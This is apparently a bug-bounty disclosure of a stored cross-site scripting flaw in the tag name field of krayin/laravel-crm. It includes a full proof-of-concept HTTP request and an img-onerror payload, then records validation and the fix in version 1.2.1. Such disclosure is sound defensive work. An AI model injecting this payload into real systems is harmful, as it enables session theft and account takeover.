Cross-site Scripting (XSS) - Stored in krayin/laravel-crm

Valid

Reported on

Nov 29th 2021

Description

Stored XSS at Name of Tag

Detail

When rendering grid for Tag, Name value is not filtered before rendering which can trigger XSS

Proof of Concept

// PoC.req
POST /admin/settings/tags/edit/1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 126
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/admin/settings/tags/edit/1
Cookie: _ga=GA1.1.758235244.1637376300; PHPSESSID=2aj34hm8nmvep57jeno66ecbtn; XSRF-TOKEN=eyJpdiI6InFQWXVobjlWektDY2hZckcxZW9OMWc9PSIsInZhbHVlIjoiVDJ3blh5aGZOZlRaRGJqTUdCOGNnQm83RWN4K3RadWFQblpvMnloS1VVRkFxdGEreG9vUGlWbFdpVFVvTUM3a3NOM3ZiRTI0aCs5b0oxaGFzVVVOQ08vc1I4aHBaZHE1NUJtSVFVRStPR0ZPMUxncll6Um1hL21UVm5hd01KYysiLCJtYWMiOiIxYWM3NDc3Y2FhOWMzNjk3M2UxYTgxODYyMzgzMTJmZjc3MjEzYTI5NGE4ODI2NTIxNmE3ZWFlMDc3NjU5MTAxIn0%3D; krayin_crm_session=eyJpdiI6IjZXWG1PK1N3WVloY20ydjFTS0hROVE9PSIsInZhbHVlIjoiNHJLbzZrd2UwYm90QWE0SFhXcWMydmR2aDNHRUxLUGNMZjJYZGhDZE14QUdvUXk2dloxQjZocGltMUxQd0piSmRmM00rL2Q5cGV1bjdNeTV2cThZZFhmRkhzcmtpY25Zbm5KUWxkZkEvS2t5dUMyMFdRREdQUXdacEF2Y2VFQVMiLCJtYWMiOiJkNWY5NTRiMmZiOWE2ZTNiMjdkNjZiNzI2ZWI2MDg0NGU4ZGI4YTM3ZmNkM2Q5NzhiZTVjMzg0YmYwZTRiOWQ1In0%3D
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Pragma: no-cache
Cache-Control: no-cache

_token=nTihBpMW1L7emIz9py20nTTtNR7XV9H4At5rpuqc&_method=PUT&name=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert%281%29%3B%22%3E

Step to Reproduce

Goto Settings choose to Tags

Choose to Create tags , at Name input with payload : "><iMg SrC="x" oNeRRor="alert(1);">

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We are processing your report and will contact the krayin/laravel-crm team within 24 hours. 2 years ago

A GitHub Issue asking the maintainers to create a SECURITY.md exists 2 years ago

lethanhphuc submitted a

patch

2 years ago

lethanhphuc

commented 2 years ago

Researcher

PR: https://github.com/krayin/laravel-crm/pull/759

Devansh validated this vulnerability 2 years ago

lethanhphuc has been awarded the disclosure bounty

The fix bounty is now up for grabs

Devansh marked this as fixed in 1.2.1 with commit 093e62 2 years ago

lethanhphuc has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation